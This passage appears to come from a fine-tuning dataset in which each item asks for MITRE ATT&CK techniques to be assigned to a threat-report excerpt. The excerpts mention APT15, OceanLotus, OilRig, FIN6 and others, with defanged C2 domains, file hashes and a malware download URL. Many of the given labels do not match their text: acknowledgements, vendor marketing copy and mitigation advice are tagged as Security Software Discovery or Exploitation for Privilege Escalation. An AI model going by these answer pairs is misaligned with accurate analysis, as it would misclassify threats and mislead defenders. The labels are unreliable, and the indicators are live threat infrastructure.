to the following domains: News.memozilla[.]org video.memozilla[.]org The BS2005 backdoor utilised the following domains for C2: Run.linodepower[.]com Singa.linodepower[.]com log.autocount[.]org RoyalDNS backdoor was seen communicating to the domain: andspurs[.]com Possible linked APT15 domains include: Micakiz.wikaba[.]org cavanic9[.]net ridingduck[.]com zipcodeterm[.]com dnsapp[.]info Published date:\u00a0 10 March 2018 Written by:\u00a0 Rob Smallridge", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f The post New MacOS Backdoor Linked to OceanLotus Found appeared first on", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additionally malware reports itself to its hardcoded command and control servers and established a backdoor connection, so the attacker may have a permanent remote connection", + "output": "- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Business and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These files are downloaded to a directory (C:\\Users\\Public\\Libraries\\tempsys) on the infected machine by Bxaki() and xparis()", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The body of the POST request may contain files contained in the cabinet format", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 3 \u2013 A list of file extensions targeted for destruction by new variant of KillDisk component As well as being able to delete system files to make the system unbootable \u2013 functionality typical for such destructive trojans \u2013 the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This is the only instance we observed where a hardcoded Google Drive URL was included in RogueRobin, which may suggest that the author may have overlooked this during testing", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It mimics the icon Finder usually applies to JPEG or text files to increase the likelihood the recipient will double-click the file", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PHOTO: a DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "17-3 Function names To target specific victims, Astaroth is locale aware; any attempts to run the malware without locale spoofing will result in failed downloads and the inability to run the .dll files", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This document exploited a newer vulnerability, CVE-2017-0199", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All zero-day exploits known, or suspected, to have been used by this group are for vulnerabilities in Internet Explorer and Flash", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "McAfee detects these threats as: RDN/Generic Exploit RDN/Generic.dx Generic PWS.y Generic.hbg Exploit-CVE2018-4878 McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The database is located in the \u201c/usr/lib/cva-ssys/My_BD\u201d folder (\u201c~/.local/cva-ssys/My_BD\u201d\u2014if the Trojan does not have root privileges)", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OfficeScan\u2019s Vulnerability Protection shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed.\u00a0Trend Micro\u2122\u00a0Deep Discovery\u2122 provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom\u00a0sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Types of attacks possibly averted include Structured Query Language (SQL) injection, cross-site scripting, and command injection.Use stringent file reputation settings \u2013 Tune the file reputation systems of your anti-virus software to the most aggressive setting possible", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We would like to thank White-Hat, Tom Lancaster\u00a0of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 14: System shut down upon discovery of security tools Ability to receive PowerShell script from the C2 server and execute on the machine", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Given the regional file format used there is a chance that some security software suites may not handle them well, and this may have provided an evasion case for the attacker.The documents sent to the targets were titled \"\"Analysis of \"\"Northern New Year in 2017\"\" and used the official logo of the Korean Ministry of Unification\"", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \u201cRocket Kitten\u201d (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open sourced tools available to the general public", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mitigation Security and system/IT administrators must practice due diligence in protecting their websites and web-based applications from threats that can undermine their security, and hijack them to do the bad guys\u2019 bidding\u2014delivering malware to their victims", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mitigation As this sample installs itself through the use of EternalBlue, the targeted protocol is SMB.\u00a0 Because of this, in order to best mitigate and avoid possible installations, you need your system updated to the latest security patches.\u00a0 Specifically, you\u2019d want to make sure that you have MS17-010 installed, as this is the security patch that patches the EternalBlue vulnerability", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In green, functions from Keychaindump C&C communication Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server", + "output": "- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN6 used another set of compromised credentials with membership to additional groups in the domain to RDP to other hosts", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This crafted zip archive exploited a WinRAR flaw that makes files in zip archives appear to have a different name and file extension", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On September 24, 2018, we observed an organization targeted by OilRig attempting to download a Zip archive from the following URL: hxxp://193.111.152[.]13/[redacted]-ITsoftwareUpdate.zip This Zip archive contained a file named [redacted]-ITsoftwareUpdate.exe (SHA256: 5f42deb792d8d6f347c58ddbf634a673b3e870ed9977fdd88760e38088cd7336), which is a variant of the OopsIE Trojan we described in detail in a blog we published in September 2018", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When exfiltrating the keychain, the keychain field is used instead of data", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sometimes it is a high profile, legitimate site such as \u201cdiplomacy.pl\u201d, hosting a ZIP archive", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ZIP archive contains a RAR SFX which installs the malware and shows an empty PDF decoy", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The entire command structure gets compressed with zlib and then encrypted using a custom stream cipher.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The 